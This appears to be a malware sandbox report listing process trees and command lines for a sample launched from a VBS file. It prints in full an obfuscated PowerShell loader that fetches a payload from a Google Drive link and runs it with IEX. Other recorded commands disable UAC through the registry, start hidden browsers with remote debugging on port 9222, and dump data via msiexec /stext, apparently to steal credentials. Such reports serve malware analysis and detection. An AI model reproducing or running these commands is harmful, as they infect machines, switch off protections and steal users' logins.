PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2308 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2308 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\36b44229a81fa005512ea72195083c77844fbd5339c7afb9eaea4505774c1753.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unshadow Teia Translated Trumbash Kommiserne Unorational Zea #>;$Kadence='Metricizes';<#Tndende Confiserie Tnkningers #>; function Condonement($Bedimple){If ($host.DebuggerEnabled) {$Subcaptaincy++;}$Sydhavnen=$Underdelene+$Bedimple.'Length' - $Subcaptaincy; for ( $Speedbaadenes=4;$Speedbaadenes -lt $Sydhavnen;$Speedbaadenes+=5){$Dispositionernes=$Speedbaadenes;$Tensaw+=$Bedimple[$Speedbaadenes];}$Tensaw;}function Begejstret($renotification){ & ($Proparent) ($renotification);}$Chloride=Condonement 'HartMSkrioProczbjeri S.hlbldnl.siaaProd/ an ';$Centralenhedens=Condonement ',ulpTBi.olUdlss Acy1Pjec2m,ld ';$Uhyrernes='Mono[CuraNAfkrET rntCrim.HuxlSMultEReinR TvrvPhotIBremCswalEBehypFuseo silIF.den HomtDiscM mmua tednSkriA yrpG koeTexaR Bef]Naad:Unde:EvidS KeneAm rCTaasURekoRskrai U atthrayQuadP PetrExp.OLinjTUni,O TilcInd.oCrouLBemr=Lipp$PryeCSob,ED gtnTeletSkudrEfteA humLSpasEDec,NH unhcoryeEkspD Ly,eslvpNt beS th ';$Chloride+=Condonement 'Symp5Jens.Beri0Hjpa F r(Ski,W Adei Cehn FeddEf eobandwOutgsFa.l godtNHernTS gt Sia,1O er0Hv s.,emi0Ords;Dege NedWMismi ysnCon 6Besy4Unco;Re.a Fdevxskra6 non4indl;Ku,i AnafrN ntvSurl:Brut1bowm3Sign1M.na.Butt0Geo.)Outg Mi rG PhieSkatc AchkDis o Aph/ ele2glar0Stem1Poch0Akko0Ant,1Supe0Fulg1St n UhelF UgyiDis.rEfteeFi ofBa voAnlgxEne,/Draw1Fase3Opva1Sad .Auro0Unga ';$Metred=Condonement 'SemiUPolySslkkeKvisrGent-IsenatilegRi pE arbn.erit ide ';$Staveren=Condonement ' Pyrh inktIn etLocapUnsts Cut:D wy/rest/ApprdAflerGeopiUltrvTeeneWitt.BisogcadooNonpoSkovg FedlStopeInds.EphycTrbeoEpitmH ut/ dkluWinzcPlan? 
ZooePharx UdnpForboAfvrrNemmtSp d=Exi drep.o ,rawEnernPhenlAh aoS rraFrihd Flh& Divi NondKa.e=Imme1 LovDJuicYR.ak3OphaH ron_t in3Ca oZTermOLen OUn.cHElapuForm_ BruyPermw FrspAfmaR Fa,erhomCPompYJe ur BrecWee HApprn Re Z edsADimsv lutxAzurbInteBTremNProggLuniL Rub ';$sprogtalentets=Condonement 'Farv>Brit ';$Proparent=Condonement 'CongIHy,pe U mXSalg ';$Snowfield='Phonoreceptor';$Speedbaadenesnfiltrede='\Kbstadboerne8.tid';Begejstret (Condonement 'Buni$RaseGpennLSoteOBalsBT ikAUn slFrug:Rumft sseiDdslLBlanTTracaSoc lAllaESk bnS.ja=mrkb$E.treTretnOvicvH,ct:TjenaXantpGalvP voudErytA.hatt ReaaEb i+Lava$ParasImpepBdetESy aeKsesD FisbBullA A mA PaaDArbeeAn tnS.onE,ordSMu in,trufDic,I KosLSit t UnsRRim.EP stdKa,mE kan ');Begejstret (Condonement ' m.r$DalegApriLRaadoompoBSup,a S rlSylp:GratTRe,irH ndaPos fsejlinaviK Dipf SafL UnfY upEPa enChroe RecSFul =Sten$MesosFlelTBefoAMetovErnreS.torNoneeSympN G.y.AskaS kspDeo L ramITutrtCert(R nt$Dotis Ov PHa vRDeteoAl nGKrysTSn,bABa yLfantEWarnNArtit .uneA,tethonnS for) po ');Begejstret (Condonement $Uhyrernes);$Staveren=$trafikflyenes[0];$Blea15=(Condonement 'Bred$PaadgbuddlTra OFormB p ea Yumlinac:For N BegAEulor MatRErnr=Def.n LeveBartW Gal-T,llo PlabBacoj S,deK nocExcot K l Est,s S rYComps Re,tBrideBreeMLivm. 
T lNProfEFurot Tan.NortWEdi E ompBHospcStadlSme IU lieCha NModuT Sel ');Begejstret ($Blea15);Begejstret (Condonement 'Kris$UdviNAutoaBannrStanr Gla.scytHpreoeEguraAxmidP gheS.agrSupesUlce[Ca e$CompM TubeE.ketReflrNyanehalvdV,ri] Tea= ael$ AdmCTendh KrolNeuro odrP neihustd De.eKar, ');$Strikvarers=Condonement 'Bai,$PalaNPul aRinnr UnprPlum.IkenDIlteo GenwChevnVrv lBakho myaDispdGe,sFFet iAberl illePens(G,pe$For SStopt Snaa envRouteE sir ReneStv.nPho ,St.l$ IliCSvo,aQuesrOvercReinoNo.coprisnHlqn) G r ';$Carcoon=$Tiltalen;Begejstret (Condonement ' mad$ TanGTrykLhjtiOmo obStryACortlpira:u vls Fo.EFimbm ifaaT kssRafeiTreeoN.nslCom o upeg veryFert= Tro(SawatMantePampsIndtT.oen-TidspSynkafa,bTF.ldHStar Dune$KragC Ph,aBackr Sd CDetooZincoFo.mnSel,) Ven ');while (!$Semasiology) {Begejstret (Condonement 'Hi h$Fra gSanslBarooAvlebDi haKon.lEfte:BktaEMngdk e osAfgiaOpfimHo ei ryonHijaaKocmt siooprinrStrueNonwrForesStup=Hono$ SputUd ar rusuBenfe Gri ') ;Begejstret $Strikvarers;Begejstret (Condonement 'SwedSVareT NytaRefoRRaketCoun-PrecS rnlU gaE HanEVirkPBi.e Ske 4Galm ');Begejstret (Condonement ' Out$ SupgPr dlMuddoSid bstenAOve LEne.: Fa S UnyeCataMNonaaDi csRu siBlanoOplul PugoMorbGMappy pid=Isep(Corrt Wa.EPersSP,iot Flo- punPRypeaNonrt rieHstni ve e$Coopc angaTr wRAutoCS,dnO O,ko m nnAtta)Kata ') ;Begejstret (Condonement ' L n$ W rgEfteL heOSur BB keArutsl Ref: A tPfa tOFresl ReiIO,tit AtiB.ummUWeatrKlubEFlorAAandUUnpeE Da.ROprasSvkk=Wood$Imp,GChuflRastO mbob CirA,topL und: ForUShyur De.aPh nNChorBUdipe PhorUnprIKonfgB,useAfklLbierSi onE Amp+Chil+Fl.r% ent$SomntfuglRDetaAValufPathiKonsKSweefBlitlEgotyreume SulNsam ESte,SHypn. 
ogpc akoO RedU rsen S pTPseu ') ;$Staveren=$trafikflyenes[$Politbureauers];}$Tilforladeligere=298086;$Racercyklernes=30728;Begejstret (Condonement 'S,if$DepaGSamlL N uOParab oveACol.LSlag:TabeGOrthrJazze.ardngocaa onAantheBrnenKjorS syeWee R I.f om=Nee HangatheE ContClou-Co vCVarmOBogmn P,ttPreteKaffnB nktBill Bo y$ H,ecM siAConfrTe,tcYo ioHostoApe,NType ');Begejstret (Condonement ' on$ UrrgstbelOveroTannbOveraBarsl P o:DdspCStaroGra.l estl GngiThrecPourl Ey eChar Gasf=i,ma akra[ NonSImmoy irs Hypt unaeFyrrmGa.o. allCU tro OphnSiddvKo.keKlavrAttat Ar ]Frem:Trev:HoejFK rrr Bero opmm eguBC tca KapsApinevejr6Rein4SkriSEpittPaulr EuliHovenStamgLuft(Styr$,ishg sodr RaneE tenGeekaFlova RiseOmsknBiassSvrmeRestrDeco)Unin ');Begejstret (Condonement 'Skue$ SinGStviL Soco BinBUnorAS alLU,de:BaltS jerHSdrra ,idF,kroTNeug Fran=kart Form[PostsNondy RidspulvtTe te isMSeri.KonstDistECo kxhaa tPun .Dip EEkspn Musc FyrOSjledDagbIUn unShe gMod,] nlg: ,tn: CruAU.grs olacEctrIFo bI kla. Sk gRehaeconct MucsAn it.tudRH poIM.idNSpeag Rou(Ind,$ S.lcMonoO AdeLSpydlDet.I F rCFalsl Sp eBid ) Tr ');Begejstret (Condonement 'Hand$,ockgGra lunifoKy.ebTilba agslTesc: ConsBestaNeglls neR.ram= Res$SpadsB hoHTil,a errFmoldTAver. PasSE ilUSlvsB neqsFritTEdu RBemyI DupN.antgProl(Kryp$SkeptBrn iJ hnLSjlefVensOFotoRana,LreedaLancDQua E tjel BehIOmdeGPrebEo terVa,ueGodm,Opha$M,narHackAHospC andesup ROmgrC.atryG arkBlodlHe teInt RVandNJoulesterS Gra) Di, ');Begejstret $salr;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Unshadow Teia Translated Trumbash Kommiserne Unorational Zea #>;$Kadence='Metricizes';<#Tndende Confiserie Tnkningers #>; function Condonement($Bedimple){If ($host.DebuggerEnabled) {$Subcaptaincy++;}$Sydhavnen=$Underdelene+$Bedimple.'Length' - $Subcaptaincy; for ( $Speedbaadenes=4;$Speedbaadenes -lt $Sydhavnen;$Speedbaadenes+=5){$Dispositionernes=$Speedbaadenes;$Tensaw+=$Bedimple[$Speedbaadenes];}$Tensaw;}function Begejstret($renotification){ & ($Proparent) ($renotification);}$Chloride=Condonement 'HartMSkrioProczbjeri S.hlbldnl.siaaProd/ an ';$Centralenhedens=Condonement ',ulpTBi.olUdlss Acy1Pjec2m,ld ';$Uhyrernes='Mono[CuraNAfkrET rntCrim.HuxlSMultEReinR TvrvPhotIBremCswalEBehypFuseo silIF.den HomtDiscM mmua tednSkriA yrpG koeTexaR Bef]Naad:Unde:EvidS KeneAm rCTaasURekoRskrai U atthrayQuadP PetrExp.OLinjTUni,O TilcInd.oCrouLBemr=Lipp$PryeCSob,ED gtnTeletSkudrEfteA humLSpasEDec,NH unhcoryeEkspD Ly,eslvpNt beS th ';$Chloride+=Condonement 'Symp5Jens.Beri0Hjpa F r(Ski,W Adei Cehn FeddEf eobandwOutgsFa.l godtNHernTS gt Sia,1O er0Hv s.,emi0Ords;Dege NedWMismi ysnCon 6Besy4Unco;Re.a Fdevxskra6 non4indl;Ku,i AnafrN ntvSurl:Brut1bowm3Sign1M.na.Butt0Geo.)Outg Mi rG PhieSkatc AchkDis o Aph/ ele2glar0Stem1Poch0Akko0Ant,1Supe0Fulg1St n UhelF UgyiDis.rEfteeFi ofBa voAnlgxEne,/Draw1Fase3Opva1Sad .Auro0Unga ';$Metred=Condonement 'SemiUPolySslkkeKvisrGent-IsenatilegRi pE arbn.erit ide ';$Staveren=Condonement ' Pyrh inktIn etLocapUnsts Cut:D wy/rest/ApprdAflerGeopiUltrvTeeneWitt.BisogcadooNonpoSkovg FedlStopeInds.EphycTrbeoEpitmH ut/ dkluWinzcPlan? 
ZooePharx UdnpForboAfvrrNemmtSp d=Exi drep.o ,rawEnernPhenlAh aoS rraFrihd Flh& Divi NondKa.e=Imme1 LovDJuicYR.ak3OphaH ron_t in3Ca oZTermOLen OUn.cHElapuForm_ BruyPermw FrspAfmaR Fa,erhomCPompYJe ur BrecWee HApprn Re Z edsADimsv lutxAzurbInteBTremNProggLuniL Rub ';$sprogtalentets=Condonement 'Farv>Brit ';$Proparent=Condonement 'CongIHy,pe U mXSalg ';$Snowfield='Phonoreceptor';$Speedbaadenesnfiltrede='\Kbstadboerne8.tid';Begejstret (Condonement 'Buni$RaseGpennLSoteOBalsBT ikAUn slFrug:Rumft sseiDdslLBlanTTracaSoc lAllaESk bnS.ja=mrkb$E.treTretnOvicvH,ct:TjenaXantpGalvP voudErytA.hatt ReaaEb i+Lava$ParasImpepBdetESy aeKsesD FisbBullA A mA PaaDArbeeAn tnS.onE,ordSMu in,trufDic,I KosLSit t UnsRRim.EP stdKa,mE kan ');Begejstret (Condonement ' m.r$DalegApriLRaadoompoBSup,a S rlSylp:GratTRe,irH ndaPos fsejlinaviK Dipf SafL UnfY upEPa enChroe RecSFul =Sten$MesosFlelTBefoAMetovErnreS.torNoneeSympN G.y.AskaS kspDeo L ramITutrtCert(R nt$Dotis Ov PHa vRDeteoAl nGKrysTSn,bABa yLfantEWarnNArtit .uneA,tethonnS for) po ');Begejstret (Condonement $Uhyrernes);$Staveren=$trafikflyenes[0];$Blea15=(Condonement 'Bred$PaadgbuddlTra OFormB p ea Yumlinac:For N BegAEulor MatRErnr=Def.n LeveBartW Gal-T,llo PlabBacoj S,deK nocExcot K l Est,s S rYComps Re,tBrideBreeMLivm. 
T lNProfEFurot Tan.NortWEdi E ompBHospcStadlSme IU lieCha NModuT Sel ');Begejstret ($Blea15);Begejstret (Condonement 'Kris$UdviNAutoaBannrStanr Gla.scytHpreoeEguraAxmidP gheS.agrSupesUlce[Ca e$CompM TubeE.ketReflrNyanehalvdV,ri] Tea= ael$ AdmCTendh KrolNeuro odrP neihustd De.eKar, ');$Strikvarers=Condonement 'Bai,$PalaNPul aRinnr UnprPlum.IkenDIlteo GenwChevnVrv lBakho myaDispdGe,sFFet iAberl illePens(G,pe$For SStopt Snaa envRouteE sir ReneStv.nPho ,St.l$ IliCSvo,aQuesrOvercReinoNo.coprisnHlqn) G r ';$Carcoon=$Tiltalen;Begejstret (Condonement ' mad$ TanGTrykLhjtiOmo obStryACortlpira:u vls Fo.EFimbm ifaaT kssRafeiTreeoN.nslCom o upeg veryFert= Tro(SawatMantePampsIndtT.oen-TidspSynkafa,bTF.ldHStar Dune$KragC Ph,aBackr Sd CDetooZincoFo.mnSel,) Ven ');while (!$Semasiology) {Begejstret (Condonement 'Hi h$Fra gSanslBarooAvlebDi haKon.lEfte:BktaEMngdk e osAfgiaOpfimHo ei ryonHijaaKocmt siooprinrStrueNonwrForesStup=Hono$ SputUd ar rusuBenfe Gri ') ;Begejstret $Strikvarers;Begejstret (Condonement 'SwedSVareT NytaRefoRRaketCoun-PrecS rnlU gaE HanEVirkPBi.e Ske 4Galm ');Begejstret (Condonement ' Out$ SupgPr dlMuddoSid bstenAOve LEne.: Fa S UnyeCataMNonaaDi csRu siBlanoOplul PugoMorbGMappy pid=Isep(Corrt Wa.EPersSP,iot Flo- punPRypeaNonrt rieHstni ve e$Coopc angaTr wRAutoCS,dnO O,ko m nnAtta)Kata ') ;Begejstret (Condonement ' L n$ W rgEfteL heOSur BB keArutsl Ref: A tPfa tOFresl ReiIO,tit AtiB.ummUWeatrKlubEFlorAAandUUnpeE Da.ROprasSvkk=Wood$Imp,GChuflRastO mbob CirA,topL und: ForUShyur De.aPh nNChorBUdipe PhorUnprIKonfgB,useAfklLbierSi onE Amp+Chil+Fl.r% ent$SomntfuglRDetaAValufPathiKonsKSweefBlitlEgotyreume SulNsam ESte,SHypn. 
ogpc akoO RedU rsen S pTPseu ') ;$Staveren=$trafikflyenes[$Politbureauers];}$Tilforladeligere=298086;$Racercyklernes=30728;Begejstret (Condonement 'S,if$DepaGSamlL N uOParab oveACol.LSlag:TabeGOrthrJazze.ardngocaa onAantheBrnenKjorS syeWee R I.f om=Nee HangatheE ContClou-Co vCVarmOBogmn P,ttPreteKaffnB nktBill Bo y$ H,ecM siAConfrTe,tcYo ioHostoApe,NType ');Begejstret (Condonement ' on$ UrrgstbelOveroTannbOveraBarsl P o:DdspCStaroGra.l estl GngiThrecPourl Ey eChar Gasf=i,ma akra[ NonSImmoy irs Hypt unaeFyrrmGa.o. allCU tro OphnSiddvKo.keKlavrAttat Ar ]Frem:Trev:HoejFK rrr Bero opmm eguBC tca KapsApinevejr6Rein4SkriSEpittPaulr EuliHovenStamgLuft(Styr$,ishg sodr RaneE tenGeekaFlova RiseOmsknBiassSvrmeRestrDeco)Unin ');Begejstret (Condonement 'Skue$ SinGStviL Soco BinBUnorAS alLU,de:BaltS jerHSdrra ,idF,kroTNeug Fran=kart Form[PostsNondy RidspulvtTe te isMSeri.KonstDistECo kxhaa tPun .Dip EEkspn Musc FyrOSjledDagbIUn unShe gMod,] nlg: ,tn: CruAU.grs olacEctrIFo bI kla. Sk gRehaeconct MucsAn it.tudRH poIM.idNSpeag Rou(Ind,$ S.lcMonoO AdeLSpydlDet.I F rCFalsl Sp eBid ) Tr ');Begejstret (Condonement 'Hand$,ockgGra lunifoKy.ebTilba agslTesc: ConsBestaNeglls neR.ram= Res$SpadsB hoHTil,a errFmoldTAver. PasSE ilUSlvsB neqsFritTEdu RBemyI DupN.antgProl(Kryp$SkeptBrn iJ hnLSjlefVensOFotoRana,LreedaLancDQua E tjel BehIOmdeGPrebEo terVa,ueGodm,Opha$M,narHackAHospC andesup ROmgrC.atryG arkBlodlHe teInt RVandNJoulesterS Gra) Di, ');Begejstret $salr;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff84c27cc40,0x7ff84c27cc4c,0x7ff84c27cc58

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,13676418500481393489,9149949538353177036,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1888 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,13676418500481393489,9149949538353177036,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,13676418500481393489,9149949538353177036,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2424 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,13676418500481393489,9149949538353177036,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,13676418500481393489,9149949538353177036,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\bkimokiusd"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lfvwodtoglfqw"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\vzbphvequtxdgldp"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4608,i,13676418500481393489,9149949538353177036,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4584 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4564,i,13676418500481393489,9149949538353177036,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4708 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4712,i,13676418500481393489,9149949538353177036,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4856 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe4,0x110,0x7ff8418d46f8,0x7ff8418d4708,0x7ff8418d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,2426443740474900385,14164072370701279149,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,2426443740474900385,14164072370701279149,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,2426443740474900385,14164072370701279149,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2108,2426443740474900385,14164072370701279149,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2108,2426443740474900385,14164072370701279149,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2108,2426443740474900385,14164072370701279149,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

